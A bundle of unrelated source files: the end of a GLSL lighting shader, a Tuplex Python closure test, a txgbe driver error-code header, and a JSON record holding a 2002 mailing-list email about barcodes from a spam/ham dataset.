fresnelPower); float specular = 0.0f; vec3 skyNormal = reflect(eyeVec, normal); vec3 skyColor = skyLightIntensity * textureCube(skyboxTex, skyNormal).rgb; vec3 ambientSkyColor = diffuseMat * skyColor; vec3 diffuseColor = vec3(0.0, 0.0, 0.0); if (numShadows >= 1) { vec3 lightColor = hdrScale * vec3(1.0, 1.0, 1.0); vec3 shadowColor = vec3(0.4, 0.4, 0.7); // colored shadow //vec3 lvec = normalize(spotLightDir); vec3 lvec = normalize(spotLightPos - gl_TexCoord[1].xyz); float ldn = max(0.0f, dot(normal, lvec)); float cosine = dot(lvec, spotLightDir); float intensity = smoothstep(spotLightCosineDecayBegin, spotLightCosineDecayEnd, cosine); float bscale = 1;//1.0f-ldn; float shadowC = shadowCoeff1(bscale); //gl_FragColor = vec4(shadowC,shadowC,shadowC,1.0f); //return; vec3 irradiance = shadowC * ldn * lightColor; // diffuse irradiance diffuseColor += diffuseMat * irradiance*intensity; // add colored shadow diffuseColor += (1.0 - shadowC*ldn) * shadowAmbient * shadowColor * diffuseMat*intensity; vec3 r = reflect(lvec, normal); specular += pow(max(0.0, dot(r, eyeVec)), specularPower)*shadowC*intensity; } // add rim light if (numShadows >= 2) { vec3 lightColor = hdrScale * vec3(1.0, 1.0, 1.0); vec3 lvec = normalize(spotLightDir2); float ldn = max(0.0f, dot(normal, lvec)); vec3 irradiance = ldn * lightColor; // diffuse irradiance diffuseColor += diffuseMat * irradiance; } vec3 color = vec3(0.0, 0.0, 0.0); color += diffuseColor; color += ambientSkyColor; color += specular*specularMat; color += hdrScale * emissive * diffuseMat; //vec3 reflectColor = diffuseMat * texture2DRect(reflectionTex, gl_FragCoord.xy).rgb; //color = reflectionCoeff * reflectColor + (1.0f - reflectionCoeff) * color; color = (fresnel * skyColor + (1.0 - fresnel) * color) * reflectivity + (1.0 - reflectivity) * color; gl_FragColor.rgb = color; gl_FragColor.w = gl_Color.w; float fog = clamp(gl_Fog.scale*(gl_Fog.end+gl_TexCoord[1].z), 0.0, 1.0); vec4 fogCol = gl_Fog.color; gl_FragColor = mix(fogCol, gl_FragColor, fog); }
6,627
778
<reponame>rahulyesantharao/tuplex #!/usr/bin/env python3 #----------------------------------------------------------------------------------------------------------------------# # # # Tuplex: Blazing Fast Python Data Science # # # # # # (c) 2017 - 2021, Tuplex team # # Created by <NAME> first on 1/1/2021 # # License: Apache 2.0 # #----------------------------------------------------------------------------------------------------------------------# from unittest import TestCase import tuplex import time class TestClosure(TestCase): def setUp(self): self.c = tuplex.Context(webui=False) def testGlobalVar(self): # function capturing global g g = 20 def f(x): return x + g res = self.c.parallelize([1, 2, 3]).map(f).collect() self.assertEqual(res, [21, 22, 23]) res = self.c.parallelize([1, 2, 3]).map(lambda x: x * g).collect() self.assertEqual(res, [20, 40, 60])
1,011
956
/* SPDX-License-Identifier: BSD-3-Clause * Copyright(c) 2015-2020 */ #ifndef _TXGBE_STATUS_H_ #define _TXGBE_STATUS_H_ /* Error Codes: * common error * module error(simple) * module error(detailed) * * (-256, 256): reserved for non-txgbe defined error code */ #define TERR_BASE (0x100) enum txgbe_error { TERR_NULL = TERR_BASE, TERR_ANY, TERR_NOSUPP, TERR_NOIMPL, TERR_NOMEM, TERR_NOSPACE, TERR_NOENTRY, TERR_CONFIG, TERR_ARGS, TERR_PARAM, TERR_INVALID, TERR_TIMEOUT, TERR_VERSION, TERR_REGISTER, TERR_FEATURE, TERR_RESET, TERR_AUTONEG, TERR_MBX, TERR_I2C, TERR_FC, TERR_FLASH, TERR_DEVICE, TERR_HOSTIF, TERR_SRAM, TERR_EEPROM, TERR_EEPROM_CHECKSUM, TERR_EEPROM_PROTECT, TERR_EEPROM_VERSION, TERR_MAC, TERR_MAC_ADDR, TERR_SFP, TERR_SFP_INITSEQ, TERR_SFP_PRESENT, TERR_SFP_SUPPORT, TERR_SFP_SETUP, TERR_PHY, TERR_PHY_ADDR, TERR_PHY_INIT, TERR_FDIR_CMD, TERR_FDIR_REINIT, TERR_SWFW_SYNC, TERR_SWFW_COMMAND, TERR_FC_CFG, TERR_FC_NEGO, TERR_LINK_SETUP, TERR_PCIE_PENDING, TERR_PBA_SECTION, TERR_OVERTEMP, TERR_UNDERTEMP, TERR_XPCS_POWERUP, }; /* WARNING: just for legacy compatibility */ #define TXGBE_NOT_IMPLEMENTED 0x7FFFFFFF #define TXGBE_ERR_OPS_DUMMY 0x3FFFFFFF /* Error Codes */ #define TXGBE_ERR_EEPROM -(TERR_BASE + 1) #define TXGBE_ERR_EEPROM_CHECKSUM -(TERR_BASE + 2) #define TXGBE_ERR_PHY -(TERR_BASE + 3) #define TXGBE_ERR_CONFIG -(TERR_BASE + 4) #define TXGBE_ERR_PARAM -(TERR_BASE + 5) #define TXGBE_ERR_MAC_TYPE -(TERR_BASE + 6) #define TXGBE_ERR_UNKNOWN_PHY -(TERR_BASE + 7) #define TXGBE_ERR_LINK_SETUP -(TERR_BASE + 8) #define TXGBE_ERR_ADAPTER_STOPPED -(TERR_BASE + 9) #define TXGBE_ERR_INVALID_MAC_ADDR -(TERR_BASE + 10) #define TXGBE_ERR_DEVICE_NOT_SUPPORTED -(TERR_BASE + 11) #define TXGBE_ERR_MASTER_REQUESTS_PENDING -(TERR_BASE + 12) #define TXGBE_ERR_INVALID_LINK_SETTINGS -(TERR_BASE + 13) #define TXGBE_ERR_AUTONEG_NOT_COMPLETE -(TERR_BASE + 14) #define TXGBE_ERR_RESET_FAILED -(TERR_BASE + 15) #define TXGBE_ERR_SWFW_SYNC -(TERR_BASE + 16) #define TXGBE_ERR_PHY_ADDR_INVALID -(TERR_BASE + 17) #define TXGBE_ERR_I2C -(TERR_BASE + 18) #define TXGBE_ERR_SFP_NOT_SUPPORTED -(TERR_BASE + 19) #define TXGBE_ERR_SFP_NOT_PRESENT -(TERR_BASE + 20) #define TXGBE_ERR_SFP_NO_INIT_SEQ_PRESENT -(TERR_BASE + 21) #define TXGBE_ERR_NO_SAN_ADDR_PTR -(TERR_BASE + 22) #define TXGBE_ERR_FDIR_REINIT_FAILED -(TERR_BASE + 23) #define TXGBE_ERR_EEPROM_VERSION -(TERR_BASE + 24) #define TXGBE_ERR_NO_SPACE -(TERR_BASE + 25) #define TXGBE_ERR_OVERTEMP -(TERR_BASE + 26) #define TXGBE_ERR_FC_NOT_NEGOTIATED -(TERR_BASE + 27) #define TXGBE_ERR_FC_NOT_SUPPORTED -(TERR_BASE + 28) #define TXGBE_ERR_SFP_SETUP_NOT_COMPLETE -(TERR_BASE + 30) #define TXGBE_ERR_PBA_SECTION -(TERR_BASE + 31) #define TXGBE_ERR_INVALID_ARGUMENT -(TERR_BASE + 32) #define TXGBE_ERR_HOST_INTERFACE_COMMAND -(TERR_BASE + 33) #define TXGBE_ERR_OUT_OF_MEM -(TERR_BASE + 34) #define TXGBE_ERR_FEATURE_NOT_SUPPORTED -(TERR_BASE + 36) #define TXGBE_ERR_EEPROM_PROTECTED_REGION -(TERR_BASE + 37) #define TXGBE_ERR_FDIR_CMD_INCOMPLETE -(TERR_BASE + 38) #define TXGBE_ERR_FW_RESP_INVALID -(TERR_BASE + 39) #define TXGBE_ERR_TOKEN_RETRY -(TERR_BASE + 40) #define TXGBE_ERR_FLASH_LOADING_FAILED -(TERR_BASE + 41) #define TXGBE_ERR_NOSUPP -(TERR_BASE + 42) #define TXGBE_ERR_UNDERTEMP -(TERR_BASE + 43) #define TXGBE_ERR_XPCS_POWER_UP_FAILED -(TERR_BASE + 44) #define TXGBE_ERR_PHY_INIT_NOT_DONE -(TERR_BASE + 45) #define TXGBE_ERR_TIMEOUT -(TERR_BASE + 46) #define TXGBE_ERR_REGISTER -(TERR_BASE + 47) #define TXGBE_ERR_MNG_ACCESS_FAILED -(TERR_BASE + 49) #endif /* _TXGBE_STATUS_H_ */
2,094
3,428
<reponame>ghalimi/stdlib {"id":"01024","group":"easy-ham-2","checksum":{"type":"MD5","value":"28499f419990c33e20cb2f0ea7c77653"},"text":"From <EMAIL> Tue Aug 13 10:31:12 2002\nReturn-Path: <<EMAIL>>\nDelivered-To: y<EMAIL>.netnoteinc.com\nReceived: from localhost (localhost [127.0.0.1])\n\tby phobos.labs.netnoteinc.com (Postfix) with ESMTP id 67131440FA\n\tfor <jm@localhost>; Tue, 13 Aug 2002 05:22:34 -0400 (EDT)\nReceived: from phobos [127.0.0.1]\n\tby localhost with IMAP (fetchmail-5.9.0)\n\tfor jm@localhost (single-drop); Tue, 13 Aug 2002 10:22:34 +0100 (IST)\nReceived: from xent.com ([64.161.22.236]) by dogma.slashnull.org\n (8.11.6/8.11.6) with ESMTP id g7D4xvb18010 for <<EMAIL>>;\n Tue, 13 Aug 2002 05:59:58 +0100\nReceived: from lair.xent.com (localhost [127.0.0.1]) by xent.com (Postfix)\n with ESMTP id 0F4AB2941C3; Mon, 12 Aug 2002 21:58:06 -0700 (PDT)\nDelivered-To: <EMAIL>\nReceived: from nycsmtp3out.rdc-nyc.rr.com (nycsmtp3out.rdc-nyc.rr.com\n [24.29.99.228]) by xent.com (Postfix) with ESMTP id 0E4CE2941C2 for\n <<EMAIL>>; Mon, 12 Aug 2002 21:57:09 -0700 (PDT)\nReceived: from damien (66-108-144-106.nyc.rr.com [66.108.144.106]) by\n nycsmtp3out.rdc-nyc.rr.com (8.12.1/Road Runner SMTP Server 1.0) with ESMTP\n id g7D50Vkl001231; Tue, 13 Aug 2002 01:00:32 -0400 (EDT)\nFrom: \"<NAME>\" <<EMAIL>>\nTo: <<EMAIL>>\nCc: <<EMAIL>>\nSubject: NYTimes.com Article: Bigger Bar Code Inches Up on Retailers\nMessage-Id: <000101c24285$d1c8da40$6a906c42@damien>\nMIME-Version: 1.0\nContent-Type: text/plain; charset=\"us-ascii\"\nContent-Transfer-Encoding: 7bit\nX-Priority: 3 (Normal)\nX-Msmail-Priority: Normal\nX-Mailer: Microsoft Outlook, Build 10.0.3416\nImportance: Normal\nX-Mimeole: Produced By Microsoft MimeOLE V5.50.4807.1700\nSender: [email protected]\nErrors-To: [email protected]\nX-Beenthere: <EMAIL>\nX-Mailman-Version: 2.0.11\nPrecedence: bulk\nList-Help: <mailto:<EMAIL>?subject=help>\nList-Post: <mailto:<EMAIL>>\nList-Subscribe: <http://xent.com/mailman/listinfo/fork>, <mailto:<EMAIL>?subject=subscribe>\nList-Id: Friends of <NAME> <fork.xent.com>\nList-Unsubscribe: <http://xent.com/mailman/listinfo/fork>,\n <mailto:<EMAIL>?subject=unsubscribe>\nList-Archive: <http://xent.com/pipermail/fork/>\nDate: Tue, 13 Aug 2002 00:56:43 -0400\n\n\nHow about a highly error corrected atomic level 3D encoding scheme that\nrelies on shape, colour and chemical make up to uniquely identify every\nobject in the universe.\n\nObjects uniquely identify themselves - theres no need for barcodes.\n\n\nhttp://xent.com/mailman/listinfo/fork\n\n\n"}
1,114